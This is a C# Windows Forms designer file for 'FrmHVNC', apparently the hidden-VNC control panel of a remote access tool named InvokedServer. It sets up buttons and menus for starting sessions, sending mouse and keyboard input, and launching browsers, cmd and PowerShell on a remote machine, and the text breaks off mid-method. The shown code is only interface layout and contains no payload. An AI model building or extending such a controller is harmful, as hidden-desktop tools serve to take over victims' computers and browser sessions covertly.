using System;
using System.ComponentModel;
using System.Drawing;
using System.Drawing.Drawing2D;
using System.Drawing.Text;
using System.Windows.Forms;
using ComponentFactory.Krypton.Toolkit;
using Guna.UI2.WinForms;
using InvokedServer.Controls;
using InvokedServer.Properties;

namespace InvokedServer.Forms
{
    partial class FrmHVNC
    {
        private IContainer components;

        protected override void Dispose(bool disposing)
        {
            if (disposing && this.components != null)
                this.components.Dispose();
            base.Dispose(disposing);
        }

        private void InitializeComponent()
        {
            this.components = (IContainer)new System.ComponentModel.Container();
            ComponentResourceManager resources = new ComponentResourceManager(typeof(FrmHVNC));
            this.lblQuality = new Label();
            this.lblQualityShow = new Label();
            this.ExtrasContextMenuStrip = new Guna2ContextMenuStrip();
            this.CapFPSToolStripMenuItem = new ToolStripMenuItem();
            this.OldGraphicsEngineToolStripMenuItem = new ToolStripMenuItem();
            this.ResetAllWindowsToolStripMenuItem = new ToolStripMenuItem();
            this.killExplorerToolStripMenuItem = new ToolStripMenuItem();
            this.pasteToolStripMenuItem = new ToolStripMenuItem();
            this.clientPasteToolStripMenuItem = new ToolStripMenuItem();
            this.FixOperaGXToolStripMenuItem = new ToolStripMenuItem();
            this.fullScreenToolStripMenuItem = new ToolStripMenuItem();
            this.hideToolStripMenuItem = new ToolStripMenuItem();
            this.toolTipButtons = new ToolTip(this.components);
            this.btnMouse = new Guna2GradientButton();
            this.btnKeyboard = new Guna2GradientButton();
            this.panelTop = new Guna2GradientPanel();
            this.WindowLabel = new Label();
            this.SizeLabel = new Label();
            this.GraphicPictureBox = new Guna2PictureBox();
            this.barQuality = new KryptonTrackBar();
            this.TrackBarPalette = new KryptonPalette(this.components);
            this.btnStop = new Guna2GradientButton();
            this.AutoExplorerCheckbox = new Guna2CheckBox();
            this.ExtrasBtn = new Guna2GradientButton();
            this.ProgramsListBtn = new Guna2GradientButton();
            this.ExplorerBtn = new Guna2GradientButton();
            this.btnStart = new Guna2GradientButton();
            this.ProgramsContextMenuStrip = new Guna2ContextMenuStrip();
            this.BrowserMenuToolStripMenuItem = new ToolStripMenuItem();
            this.ChromeToolStripMenuItem = new ToolStripMenuItem();
            this.FirefoxToolStripMenuItem = new ToolStripMenuItem();
            this.EdgeToolStripMenuItem = new ToolStripMenuItem();
            this.OperaToolStripMenuItem = new ToolStripMenuItem();
            this.OperaGxToolStripMenuItem = new ToolStripMenuItem();
            this.BraveToolStripMenuItem = new ToolStripMenuItem();
            this.CmdToolStripMenuItem = new ToolStripMenuItem();
            this.PowershellToolStripMenuItem = new ToolStripMenuItem();
            this.btnShow = new Guna2GradientButton();
            this.btnExit = new Guna2GradientButton();
            this.guna2Elipse1 = new Guna2Elipse(this.components);
            this.PluginLabel = new Label();
            this.hvncPictureBox1 = new hvncPictureBox();
            this.ExtrasContextMenuStrip.SuspendLayout();
            this.panelTop.SuspendLayout();
            ((ISupportInitialize)this.GraphicPictureBox).BeginInit();
            this.ProgramsContextMenuStrip.SuspendLayout();
            ((ISupportInitialize)this.hvncPictureBox1).BeginInit();
            this.SuspendLayout();
            this.lblQuality.AutoSize = true;
            this.lblQuality.Location = new Point(161, 4);
            this.lblQuality.Name = "lblQuality";
            this.lblQuality.Size = new Size(46, 13);
            this.lblQuality.TabIndex = 4;
            this.lblQuality.Text = "Quality:";
            this.lblQualityShow.AutoSize = true;
            this.lblQualityShow.Location = new Point(157, 17);
            this.lblQualityShow.Name = "lblQualityShow";
            this.lblQualityShow.Size = new Size(56, 13);
            this.lblQualityShow.TabIndex = 5;
            this.lblQualityShow.Text = "100 (best)";
            this.ExtrasContextMenuStrip.Items.AddRange(new ToolStripItem[9]
            {
        (ToolStripItem) this.CapFPSToolStripMenuItem,
        (ToolStripItem) this.OldGraphicsEngineToolStripMenuItem,
        (ToolStripItem) this.ResetAllWindowsToolStripMenuItem,
        (ToolStripItem) this.killExplorerToolStripMenuItem,
        (ToolStripItem) this.pasteToolStripMenuItem,
        (ToolStripItem) this.clientPasteToolStripMenuItem,
        (ToolStripItem) this.FixOperaGXToolStripMenuItem,
        (ToolStripItem) this.fullScreenToolStripMenuItem,
        (ToolStripItem) this.hideToolStripMenuItem
            });
            this.ExtrasContextMenuStrip.Name = "hVNCContextMenuStrip";
            this.ExtrasContextMenuStrip.RenderStyle.ArrowColor = Color.FromArgb(151, 143, (int)byte.MaxValue);
            this.ExtrasContextMenuStrip.RenderStyle.BorderColor = Color.Gainsboro;
            this.ExtrasContextMenuStrip.RenderStyle.ColorTable = (ProfessionalColorTable)null;
            this.ExtrasContextMenuStrip.RenderStyle.RoundedEdges = true;
            this.ExtrasContextMenuStrip.RenderStyle.SelectionArrowColor = Color.White;
            this.ExtrasContextMenuStrip.RenderStyle.SelectionBackColor = Color.FromArgb(100, 88, (int)byte.MaxValue);
            this.ExtrasContextMenuStrip.RenderStyle.SelectionForeColor = Color.White;
            this.ExtrasContextMenuStrip.RenderStyle.SeparatorColor = Color.Gainsboro;
            this.ExtrasContextMenuStrip.RenderStyle.TextRenderingHint = TextRenderingHint.SystemDefault;
            this.ExtrasContextMenuStrip.Size = new Size(220, 202);
            this.CapFPSToolStripMenuItem.BackColor = Color.FromArgb(58, 61, 76);
            this.CapFPSToolStripMenuItem.Checked = true;
            this.CapFPSToolStripMenuItem.CheckOnClick = true;
            this.CapFPSToolStripMenuItem.CheckState = CheckState.Checked;
            this.CapFPSToolStripMenuItem.ForeColor = Color.White;
            this.CapFPSToolStripMenuItem.Name = "CapFPSToolStripMenuItem";
            this.CapFPSToolStripMenuItem.Size = new Size(219, 22);
            this.CapFPSToolStripMenuItem.Text = "Cap FPS";
            this.CapFPSToolStripMenuItem.Click += new EventHandler(this.CapFPSToolStripMenuItem_Click);
            this.OldGraphicsEngineToolStripMenuItem.BackColor = Color.FromArgb(58, 61, 76);
            this.OldGraphicsEngineToolStripMenuItem.CheckOnClick = true;
            this.OldGraphicsEngineToolStripMenuItem.ForeColor = Color.White;
            this.OldGraphicsEngineToolStripMenuItem.Name = "OldGraphicsEngineToolStripMenuItem";
            this.OldGraphicsEngineToolStripMenuItem.Size = new Size(219, 22);
            this.OldGraphicsEngineToolStripMenuItem.Text = "Enable Old Graphics Engine";
            this.OldGraphicsEngineToolStripMenuItem.Click += new EventHandler(this.OldGraphicsEngineToolStripMenuItem_Click);
            this.ResetAllWindowsToolStripMenuItem.BackColor = Color.FromArgb(58, 61, 76);
            this.ResetAllWindowsToolStripMenuItem.ForeColor = Color.White;
            this.ResetAllWindowsToolStripMenuItem.Image = (Image)resources.GetObject("ResetAllWindowsToolStripMenuItem.Image");
            this.ResetAllWindowsToolStripMenuItem.Name = "ResetAllWindowsToolStripMenuItem";
            this.ResetAllWindowsToolStripMenuItem.Size = new Size(219, 22);
            this.ResetAllWindowsToolStripMenuItem.Text = "Reset All Windows";
            this.ResetAllWindowsToolStripMenuItem.Click += new EventHandler(this.MoveWindowsToolStripMenuItem_Click);
            this.killExplorerToolStripMenuItem.BackColor = Color.FromArgb(58, 61, 76);
            this.killExplorerToolStripMenuItem.ForeColor = Color.White;
            this.killExplorerToolStripMenuItem.Image = (Image)Resources.FileExplorer;
            this.killExplorerToolStripMenuItem.Name = "killExplorerToolStripMenuItem";
            this.killExplorerToolStripMenuItem.Size = new Size(219, 22);
            this.killExplorerToolStripMenuItem.Text = "Kill Explorer";
            this.killExplorerToolStripMenuItem.Click += new EventHandler(this.killExplorerToolStripMenuItem_Click);
            this.pasteToolStripMenuItem.BackColor = Color.FromArgb(58, 61, 76);
            this.pasteToolStripMenuItem.ForeColor = Color.White;
            this.pasteToolStripMenuItem.Image = (Image)Resources.clipboard_text;
            this.pasteToolStripMenuItem.Name = "pasteToolStripMenuItem";
            this.pasteToolStripMenuItem.Size = new Size(219, 22);
            this.pasteToolStripMenuItem.Text = "Paste";
            this.pasteToolStripMenuItem.Click += new EventHandler(this.pasteToolStripMenuItem_Click);
            this.clientPasteToolStripMenuItem.BackColor = Color.FromArgb(58, 61, 76);
            this.clientPasteToolStripMenuItem.ForeColor = Color.White;
            this.clientPasteToolStripMenuItem.Image = (Image)Resources.page_paste;
            this.clientPasteToolStripMenuItem.Name = "clientPasteToolStripMenuItem";
            this.clientPasteToolStripMenuItem.Size = new Size(219, 22);
            this.clientPasteToolStripMenuItem.Text = "Client Clipboard Paste";
            this.clientPasteToolStripMenuItem.Click += new EventHandler(this.clientPasteToolStripMenuItem_Click);
            this.FixOperaGXToolStripMenuItem.BackColor = Color.FromArgb(58, 61, 76);
            this.FixOperaGXToolStripMenuItem.ForeColor = Color.White;
            this.FixOperaGXToolStripMenuItem.Image = (Image)Resources.wrench;
            this.FixOperaGXToolStripMenuItem.Name = "FixOperaGXToolStripMenuItem";
            this.FixOperaGXToolStripMenuItem.Size = new Size(219, 22);
            this.FixOperaGXToolStripMenuItem.Text = "Fix OperaGX";
            this.FixOperaGXToolStripMenuItem.Click += new EventHandler(this.FixOperaGXToolStripMenuItem_Click);
            this.fullScreenToolStripMenuItem.BackColor = Color.FromArgb(58, 61, 76);
            this.fullScreenToolStripMenuItem.ForeColor = Color.White;
            this.fullScreenToolStripMenuItem.Image = (Image)Resources.arrow_inout;
            this.fullScreenToolStripMenuItem.Name = "fullScreenToolStripMenuItem";
            this.fullScreenToolStripMenuItem.Size = new Size(219, 22);
            this.fullScreenToolStripMenuItem.Text = "FullScreen";
            this.fullScreenToolStripMenuItem.Click += new EventHandler(this.fullScreenToolStripMenuItem_Click);
            this.hideToolStripMenuItem.BackColor = Color.FromArgb(58, 61, 76);
            this.hideToolStripMenuItem.ForeColor = Color.White;
            this.hideToolStripMenuItem.Image = (Image)Resources.arrow_up;
            this.hideToolStripMenuItem.Name = "hideToolStripMenuItem";
            this.hideToolStripMenuItem.Size = new Size(219, 22);
            this.hideToolStripMenuItem.Text = "Hide";
            this.hideToolStripMenuItem.Click += new EventHandler(this.hideToolStripMenuItem_Click);
            this.btnMouse.Animated = true;
            this.btnMouse.BackColor = Color.FromArgb(62, 72, 88);
            this.btnMouse.BorderColor = Color.FromArgb(72, 82, 98);
            this.btnMouse.BorderRadius = 2;
            this.btnMouse.BorderThickness = 1;
            this.btnMouse.DisabledState.BorderColor = Color.DarkGray;
            this.btnMouse.DisabledState.CustomBorderColor = Color.DarkGray;
            this.btnMouse.DisabledState.FillColor = Color.FromArgb(169, 169, 169);
            this.btnMouse.DisabledState.FillColor2 = Color.FromArgb(169, 169, 169);
            this.btnMouse.DisabledState.ForeColor = Color.FromArgb(141, 141, 141);
            this.btnMouse.FillColor = Color.FromArgb(35, 35, 35);
            this.btnMouse.FillColor2 = Color.FromArgb(62, 72, 88);
            this.btnMouse.Font = new Font("Segoe UI", 8.25f);
            this.btnMouse.ForeColor = Color.White;
            this.btnMouse.GradientMode = LinearGradientMode.ForwardDiagonal;
            this.btnMouse.Image = (Image)Resources.mouse_add;
            this.btnMouse.ImageSize = new Size(16, 16);
            this.btnMouse.Location = new Point(295, 5);
            this.btnMouse.Name = "btnMouse";
            this.btnMouse.Size = new Size(28, 28);
            this.btnMouse.TabIndex = 34;
            this.btnMouse.TabStop = false;
            this.toolTipButtons.SetToolTip((Control)this.btnMouse, "Enable mouse input.");
            this.btnMouse.Click += new EventHandler(this.btnMouse_Click);
            this.btnKeyboard.Animated = true;
            this.btnKeyboard.BackColor = Color.FromArgb(62, 72, 88);
            this.btnKeyboard.BorderColor = Color.FromArgb(72, 82, 98);
            this.btnKeyboard.BorderRadius = 2;
            this.btnKeyboard.BorderThickness = 1;
            this.btnKeyboard.DisabledState.BorderColor = Color.DarkGray;
            this.btnKeyboard.DisabledState.CustomBorderColor = Color.DarkGray;
            this.btnKeyboard.DisabledState.FillColor = Color.FromArgb(169, 169, 169);
            this.btnKeyboard.DisabledState.FillColor2 = Color.FromArgb(169, 169, 169);
            this.btnKeyboard.DisabledState.ForeColor = Color.FromArgb(141, 141, 141);
            this.btnKeyboard.FillColor = Color.FromArgb(35, 35, 35);
            this.btnKeyboard.FillColor2 = Color.FromArgb(62, 72, 88);
            this.btnKeyboard.Font = new Font("Segoe UI", 8.25f);
            this.btnKeyboard.ForeColor = Color.White;
            this.btnKeyboard.GradientMode = LinearGradientMode.ForwardDiagonal;
            this.btnKeyboard.Image = (Image)Resources.keyboard_add;
            this.btnKeyboard.ImageSize = new Size(16, 16);
            this.btnKeyboard.Location = new Point(329, 5);
            this.btnKeyboard.Name = "btnKeyboard";
            this.btnKeyboard.Size = new Size(28, 28);
            this.btnKeyboard.TabIndex = 35;
            this.btnKeyboard.TabStop = false;
            this.toolTipButtons.SetToolTip((Control)this.btnKeyboard, "Enable keyboard input.");
            this.btnKeyboard.Click += new EventHandler(this.btnKeyboard_Click);
            this.panelTop.BackColor = Color.FromArgb(58, 61, 76);
            this.panelTop.BorderColor = Color.FromArgb((int)byte.MaxValue, 128, 128);
            this.panelTop.Controls.Add((Control)this.WindowLabel);
            this.panelTop.Controls.Add((Control)this.SizeLabel);
            this.panelTop.Controls.Add((Control)this.GraphicPictureBox);
            this.panelTop.Controls.Add((Control)this.barQuality);
            this.panelTop.Controls.Add((Control)this.btnKeyboard);
            this.panelTop.Controls.Add((Control)this.btnMouse);
            this.panelTop.Controls.Add((Control)this.btnStop);
            this.panelTop.Controls.Add((Control)this.AutoExplorerCheckbox);
            this.panelTop.Controls.Add((Control)this.ExtrasBtn);
            this.panelTop.Controls.Add((Control)this.ProgramsListBtn);
            this.panelTop.Controls.Add((Control)this.ExplorerBtn);
            this.panelTop.Controls.Add((Control)this.lblQualityShow);
            this.panelTop.Controls.Add((Control)this.btnStart);
            this.panelTop.Controls.Add((Control)this.lblQuality);
            this.panelTop.Dock = DockStyle.Top;
            this.panelTop.ForeColor = Color.White;
            this.panelTop.Location = new Point(0, 0);
            this.panelTop.Name = "panelTop";
            this.panelTop.Size = new Size(755, 36);
            this.panelTop.TabIndex = 10;
            this.WindowLabel.AutoSize = true;
            this.WindowLabel.BackColor = Color.FromArgb(62, 72, 88);
            this.WindowLabel.Location = new Point(447, 11);
            this.WindowLabel.Margin = new Padding(0);
            this.WindowLabel.Name = "WindowLabel";
            this.WindowLabel.Size = new Size(62, 13);
            this.WindowLabel.TabIndex = 44;
            this.WindowLabel.Text = "Windows: ";
            this.WindowLabel.Visible = false;
            this.SizeLabel.AutoSize = true;
            this.SizeLabel.BackColor = Color.FromArgb(62, 72, 88);
            this.SizeLabel.Location = new Point(366, 11);
            this.SizeLabel.Margin = new Padding(0);
            this.SizeLabel.Name = "SizeLabel";
            this.SizeLabel.Size = new Size(33, 13);
            this.SizeLabel.TabIndex = 43;
            this.SizeLabel.Text = "Size: ";
            this.SizeLabel.Visible = false;
            this.GraphicPictureBox.BackColor = Color.FromArgb(32, 42, 58);
            this.GraphicPictureBox.FillColor = Color.FromArgb(62, 72, 88);
            this.GraphicPictureBox.ImageRotate = 0.0f;
            this.GraphicPictureBox.Location = new Point(363, 7);
            this.GraphicPictureBox.Name = "GraphicPictureBox";
            this.GraphicPictureBox.Size = new Size(14, 23);
            this.GraphicPictureBox.SizeMode = PictureBoxSizeMode.CenterImage;
            this.GraphicPictureBox.TabIndex = 42;
            this.GraphicPictureBox.TabStop = false;
            this.barQuality.CausesValidation = false;
            this.barQuality.DrawBackground = true;
            this.barQuality.Location = new Point(219, 3);
            this.barQuality.Maximum = 100;
            this.barQuality.Minimum = 1;
            this.barQuality.Name = "barQuality";
            this.barQuality.Palette = (IPalette)this.TrackBarPalette;
            this.barQuality.PaletteMode = PaletteMode.Custom;
            this.barQuality.Size = new Size(70, 27);
            this.barQuality.TabIndex = 41;
            this.barQuality.TabStop = false;
            this.barQuality.TickStyle = TickStyle.TopLeft;
            this.barQuality.Value = 100;
            this.barQuality.ValueChanged += new EventHandler(this.barQuality_Scroll);
            this.TrackBarPalette.BasePaletteMode = PaletteMode.Global;
            this.TrackBarPalette.Common.StateCommon.Back.Color1 = Color.FromArgb(58, 61, 76);
            this.TrackBarPalette.Common.StateCommon.Back.Color2 = Color.FromArgb(58, 61, 76);
            this.TrackBarPalette.FormStyles.FormCommon.StateActive.Back.Color1 = Color.FromArgb((int)byte.MaxValue, (int)byte.MaxValue, 192);
            this.TrackBarPalette.FormStyles.FormCommon.StateActive.Back.Color2 = Color.FromArgb((int)byte.MaxValue, 192, (int)byte.MaxValue);
            this.TrackBarPalette.FormStyles.FormCommon.StateCommon.Back.Color1 = Color.FromArgb(58, 61, 76);
            this.TrackBarPalette.FormStyles.FormCommon.StateCommon.Back.Color2 = Color.FromArgb(58, 61, 76);
            this.TrackBarPalette.FormStyles.FormCustom1.StateCommon.Back.Color1 = Color.FromArgb(192, (int)byte.MaxValue, (int)byte.MaxValue);
            this.TrackBarPalette.FormStyles.FormCustom1.StateCommon.Back.Color2 = Color.Red;
            this.TrackBarPalette.TrackBar.OverrideFocus.Tick.Color1 = Color.FromArgb(92, 102, 118);
            this.TrackBarPalette.TrackBar.OverrideFocus.Tick.Color2 = Color.FromArgb(92, 102, 118);
            this.TrackBarPalette.TrackBar.OverrideFocus.Tick.Color3 = Color.FromArgb(58, 61, 76);
            this.TrackBarPalette.TrackBar.OverrideFocus.Tick.Color4 = Color.FromArgb(58, 61, 76);
            this.TrackBarPalette.TrackBar.OverrideFocus.Tick.Color5 = Color.FromArgb(58, 61, 76);
            this.TrackBarPalette.TrackBar.StateCommon.Position.Color1 = Color.FromArgb(92, 102, 118);
            this.TrackBarPalette.TrackBar.StateCommon.Position.Color2 = Color.FromArgb(92, 102, 118);
            this.TrackBarPalette.TrackBar.StateCommon.Position.Color3 = Color.FromArgb(58, 61, 76);
            this.TrackBarPalette.TrackBar.StateCommon.Position.Color4 = Color.FromArgb(58, 61, 76);
            this.TrackBarPalette.TrackBar.StateCommon.Position.Color5 = Color.FromArgb(58, 61, 76);
            this.TrackBarPalette.TrackBar.StateCommon.Tick.Color1 = Color.FromArgb(92, 102, 118);
            this.TrackBarPalette.TrackBar.StateCommon.Tick.Color2 = Color.FromArgb(92, 102, 118);
            this.TrackBarPalette.TrackBar.StateCommon.Tick.Color3 = Color.FromArgb(92, 102, 118);
            this.TrackBarPalette.TrackBar.StateCommon.Tick.Color4 = Color.FromArgb(92, 102, 118);
            this.TrackBarPalette.TrackBar.StateCommon.Tick.Color5 = Color.FromArgb(92, 102, 118);
            this.TrackBarPalette.TrackBar.StateCommon.Track.Color1 = Color.FromArgb(92, 102, 118);
            this.TrackBarPalette.TrackBar.StateCommon.Track.Color2 = Color.FromArgb(92, 102, 118);
            this.TrackBarPalette.TrackBar.StateCommon.Track.Color3 = Color.FromArgb(92, 102, 118);
            this.TrackBarPalette.TrackBar.StateCommon.Track.Color4 = Color.FromArgb(92, 102, 118);
            this.TrackBarPalette.TrackBar.StateCommon.Track.Color5 = Color.FromArgb(92, 102, 118);
            this.TrackBarPalette.TrackBar.StateNormal.Tick.Color1 = Color.FromArgb(92, 102, 118);
            this.TrackBarPalette.TrackBar.StateNormal.Tick.Color2 = Color.FromArgb(92, 102, 118);
            this.TrackBarPalette.TrackBar.StateNormal.Tick.Color3 = Color.FromArgb(58, 61, 76);
            this.TrackBarPalette.TrackBar.StateNormal.Tick.Color4 = Color.FromArgb(58, 61, 76);
            this.TrackBarPalette.TrackBar.StateNormal.Tick.Color5 = Color.FromArgb(58, 61, 76);
            this.TrackBarPalette.TrackBar.StatePressed.Position.Color1 = Color.FromArgb(151, 164, 227);
            this.TrackBarPalette.TrackBar.StatePressed.Position.Color2 = Color.FromArgb(151, 164, 227);
            this.TrackBarPalette.TrackBar.StatePressed.Position.Color3 = Color.FromArgb(92, 102, 118);
            this.TrackBarPalette.TrackBar.StatePressed.Position.Color4 = Color.FromArgb(92, 102, 118);
            this.TrackBarPalette.TrackBar.StatePressed.Position.Color5 = Color.FromArgb(92, 102, 118);
            this.TrackBarPalette.TrackBar.StateTracking.Position.Color1 = Color.FromArgb(151, 164, 227);
            this.TrackBarPalette.TrackBar.StateTracking.Position.Color2 = Color.FromArgb(151, 164, 227);
            this.TrackBarPalette.TrackBar.StateTracking.Position.Color3 = Color.FromArgb(92, 102, 118);
            this.TrackBarPalette.TrackBar.StateTracking.Position.Color4 = Color.FromArgb(92, 102, 118);
            this.TrackBarPalette.TrackBar.StateTracking.Position.Color5 = Color.FromArgb(92, 102, 118);
            this.btnStop.Animated = true;
            this.btnStop.BorderColor = Color.FromArgb(200, 0, 0);
            this.btnStop.BorderRadius = 2;
            this.btnStop.BorderThickness = 1;
            this.btnStop.DisabledState.BorderColor = Color.DarkGray;
            this.btnStop.DisabledState.CustomBorderColor = Color.DarkGray;
            this.btnStop.DisabledState.FillColor = Color.FromArgb(169, 169, 169);
            this.btnStop.DisabledState.FillColor2 = Color.FromArgb(169, 169, 169);
            this.btnStop.DisabledState.ForeColor = Color.FromArgb(141, 141, 141);
            this.btnStop.FillColor = Color.FromArgb(35, 35, 35);
            this.btnStop.FillColor2 = Color.FromArgb(100, 35, 35);
            this.btnStop.Font = new Font("Segoe UI", 8.25f);
            this.btnStop.ForeColor = Color.FromArgb(250, 0, 0);
            this.btnStop.GradientMode = LinearGradientMode.ForwardDiagonal;
            this.btnStop.Location = new Point(86, 5);
            this.btnStop.Name = "btnStop";
            this.btnStop.Size = new Size(68, 23);
            this.btnStop.TabIndex = 33;
            this.btnStop.Text = "Stop";
            this.btnStop.Click += new EventHandler(this.btnStop_Click);
            this.AutoExplorerCheckbox.Anchor = AnchorStyles.Top | AnchorStyles.Right;
            this.AutoExplorerCheckbox.AutoSize = true;
            this.AutoExplorerCheckbox.Checked = true;
            this.AutoExplorerCheckbox.CheckedState.BorderRadius = 0;
            this.AutoExplorerCheckbox.CheckedState.BorderThickness = 0;
            this.AutoExplorerCheckbox.CheckedState.FillColor = Color.FromArgb(35, 35, 35);
            this.AutoExplorerCheckbox.CheckState = CheckState.Checked;
            this.AutoExplorerCheckbox.Location = new Point(486, 11);
            this.AutoExplorerCheckbox.Name = "AutoExplorerCheckbox";
            this.AutoExplorerCheckbox.Size = new Size(97, 17);
            this.AutoExplorerCheckbox.TabIndex = 31;
            this.AutoExplorerCheckbox.Text = "Auto-Explorer";
            this.AutoExplorerCheckbox.UncheckedState.BorderColor = Color.FromArgb(125, 137, 149);
            this.AutoExplorerCheckbox.UncheckedState.BorderRadius = 0;
            this.AutoExplorerCheckbox.UncheckedState.BorderThickness = 0;
            this.AutoExplorerCheckbox.UncheckedState.FillColor = Color.FromArgb(125, 137, 149);
            this.ExtrasBtn.Anchor = AnchorStyles.Top | AnchorStyles.Right;
            this.ExtrasBtn.Animated = true;
            this.ExtrasBtn.BackColor = Color.FromArgb(62, 72, 88);
            this.ExtrasBtn.BorderColor = Color.FromArgb(72, 82, 98);
            this.ExtrasBtn.BorderRadius = 2;
            this.ExtrasBtn.BorderThickness = 1;
            this.ExtrasBtn.DisabledState.BorderColor = Color.DarkGray;
            this.ExtrasBtn.DisabledState.CustomBorderColor = Color.DarkGray;
            this.ExtrasBtn.DisabledState.FillColor = Color.FromArgb(169, 169, 169);
            this.ExtrasBtn.DisabledState.FillColor2 = Color.FromArgb(169, 169, 169);
            this.ExtrasBtn.DisabledState.ForeColor = Color.FromArgb(141, 141, 141);
            this.ExtrasBtn.FillColor = Color.FromArgb(35, 35, 35);
            this.ExtrasBtn.FillColor2 = Color.FromArgb(62, 72, 88);
            this.ExtrasBtn.Font = new Font("Segoe UI", 8.25f);
            this.ExtrasBtn.ForeColor = Color.White;
            this.ExtrasBtn.GradientMode = LinearGradientMode.ForwardDiagonal;
            this.ExtrasBtn.Image = (Image)Resources.toolbox;
            this.ExtrasBtn.ImageSize = new Size(16, 16);
            this.ExtrasBtn.Location = new Point(672, 7);
            this.ExtrasBtn.Name = "ExtrasBtn";
            this.ExtrasBtn.Size = new Size(70, 23);
            this.ExtrasBtn.TabIndex = 30;
            this.ExtrasBtn.Text = "Extra";
            this.ExtrasBtn.Click += new EventHandler(this.ExtrasBtn_Click);
            this.ProgramsListBtn.Anchor = AnchorStyles.Top | AnchorStyles.Right;
            this.ProgramsListBtn.Animated = true;
            this.ProgramsListBtn.BackColor = Color.FromArgb(62, 72, 88);
            this.ProgramsListBtn.BorderColor = Color.FromArgb(72, 82, 98);
            this.ProgramsListBtn.BorderRadius = 2;
            this.ProgramsListBtn.BorderThickness = 1;
            this.ProgramsListBtn.DisabledState.BorderColor = Color.DarkGray;
            this.ProgramsListBtn.DisabledState.CustomBorderColor = Color.DarkGray;
            this.ProgramsListBtn.DisabledState.FillColor = Color.FromArgb(169, 169, 169);
            this.ProgramsListBtn.DisabledState.FillColor2 = Color.FromArgb(169, 169, 169);
            this.ProgramsListBtn.DisabledState.ForeColor = Color.FromArgb(141, 141, 141);
            this.ProgramsListBtn.FillColor = Color.FromArgb(35, 35, 35);
            this.ProgramsListBtn.FillColor2 = Color.FromArgb(62, 72, 88);
            this.ProgramsListBtn.Font = new Font("Segoe UI", 8.25f);
            this.ProgramsListBtn.ForeColor = Color.White;
            this.ProgramsListBtn.GradientMode = LinearGradientMode.ForwardDiagonal;
            this.ProgramsListBtn.Image = (Image)Resources.HiddenProgram_161;
            this.ProgramsListBtn.ImageSize = new Size(16, 16);
            this.ProgramsListBtn.Location = new Point(587, 7);
            this.ProgramsListBtn.Name = "ProgramsListBtn";
            this.ProgramsListBtn.Size = new Size(79, 23);
            this.ProgramsListBtn.TabIndex = 29;
            this.ProgramsListBtn.Text = "Programs";
            this.ProgramsListBtn.Click += new EventHandler(this.ProgramsListBtn_Click);
            this.ExplorerBtn.Anchor = AnchorStyles.Top | AnchorStyles.Right;
            this.ExplorerBtn.Animated = true;
            this.ExplorerBtn.BackColor = Color.FromArgb(62, 72, 88);
            this.ExplorerBtn.BorderColor = Color.FromArgb(72, 82, 98);
            this.ExplorerBtn.BorderRadius = 2;
            this.ExplorerBtn.BorderThickness = 1;
            this.ExplorerBtn.DisabledState.BorderColor = Color.DarkGray;
            this.ExplorerBtn.DisabledState.CustomBorderColor = Color.DarkGray;
            this.ExplorerBtn.DisabledState.FillColor = Color.FromArgb(169, 169, 169);
            this.ExplorerBtn.DisabledState.FillColor2 = Color.FromArgb(169, 169, 169);
            this.ExplorerBtn.DisabledState.ForeColor = Color.FromArgb(141, 141, 141);
            this.ExplorerBtn.FillColor = Color.FromArgb(35, 35, 35);
            this.ExplorerBtn.FillColor2 = Color.FromArgb(62, 72, 88);
            this.ExplorerBtn.Font = new Font("Segoe UI", 8.25f);
            this.ExplorerBtn.ForeColor = Color.White;
            this.ExplorerBtn.GradientMode = LinearGradientMode.ForwardDiagonal;
            this.ExplorerBtn.Image = (Image)Resources.FileExplorer;
            this.ExplorerBtn.ImageSize = new Size(16, 16);
            this.ExplorerBtn.Location = new Point(383, 7);
            this.ExplorerBtn.Name = "ExplorerBtn";
            this.ExplorerBtn.Size = new Size(97, 23);
            this.ExplorerBtn.TabIndex = 28;
            this.ExplorerBtn.Text = "Start Explorer";
            this.ExplorerBtn.Click += new EventHandler(this.ExplorerBtn_Click);
            this.btnStart.Animated = true;
            this.btnStart.BorderColor = Color.FromArgb(0, 200, 0);
            this.btnStart.BorderRadius = 2;
            this.btnStart.BorderThickness = 1;
            this.btnStart.DisabledState.BorderColor = Color.DarkGray;
            this.btnStart.DisabledState.CustomBorderColor = Color.DarkGray;
            this.btnStart.DisabledState.FillColor = Color.FromArgb(169, 169, 169);
            this.btnStart.DisabledState.FillColor2 = Color.FromArgb(169, 169, 169);
            this.btnStart.DisabledState.ForeColor = Color.FromArgb(141, 141, 141);
            this.btnStart.FillColor = Color.FromArgb(35, 35, 35);
            this.btnStart.FillColor2 = Color.FromArgb(35, 100, 35);
            this.btnStart.Font = new Font("Segoe UI", 8.25f);
            this.btnStart.ForeColor = Color.FromArgb(0, 250, 0);
            this.btnStart.GradientMode = LinearGradientMode.ForwardDiagonal;
            this.btnStart.Location = new Point(12, 5);
            this.btnStart.Name = "btnStart";
            this.btnStart.Size = new Size(68, 23);
            this.btnStart.TabIndex = 27;
            this.btnStart.Text = "Start";
            this.btnStart.Click += new EventHandler(this.btnStart_Click);
            this.ProgramsContextMenuStrip.Items.AddRange(new ToolStripItem[9]
            {
        (ToolStripItem) this.BrowserMenuToolStripMenuItem,
        (ToolStripItem) this.ChromeToolStripMenuItem,
        (ToolStripItem) this.FirefoxToolStripMenuItem,
        (ToolStripItem) this.EdgeToolStripMenuItem,
        (ToolStripItem) this.OperaToolStripMenuItem,
        (ToolStripItem) this.OperaGxToolStripMenuItem,
        (ToolStripItem) this.BraveToolStripMenuItem,
        (ToolStripItem) this.CmdToolStripMenuItem,
        (ToolStripItem) this.PowershellToolStripMenuItem
            });
            this.ProgramsContextMenuStrip.Name = "ProgramsContextMenuStrip";
            this.ProgramsContextMenuStrip.RenderStyle.ArrowColor = Color.FromArgb(151, 143, (int)byte.MaxValue);
            this.ProgramsContextMenuStrip.RenderStyle.BorderColor = Color.Gainsboro;
            this.ProgramsContextMenuStrip.RenderStyle.ColorTable = (ProfessionalColorTable)null;
            this.ProgramsContextMenuStrip.RenderStyle.RoundedEdges = true;
            this.ProgramsContextMenuStrip.RenderStyle.SelectionArrowColor = Color.White;
            this.ProgramsContextMenuStrip.RenderStyle.SelectionBackColor = Color.FromArgb(100, 88, (int)byte.MaxValue);
            this.ProgramsContextMenuStrip.RenderStyle.SelectionForeColor = Color.White;
            this.ProgramsContextMenuStrip.RenderStyle.SeparatorColor = Color.Gainsboro;
            this.ProgramsContextMenuStrip.RenderStyle.TextRenderingHint = TextRenderingHint.SystemDefault;
            this.ProgramsContextMenuStrip.Size = new Size(181, 224);
            this.BrowserMenuToolStripMenuItem.BackColor = Color.FromArgb(58, 61, 76);
            this.BrowserMenuToolStripMenuItem.ForeColor = Color.White;
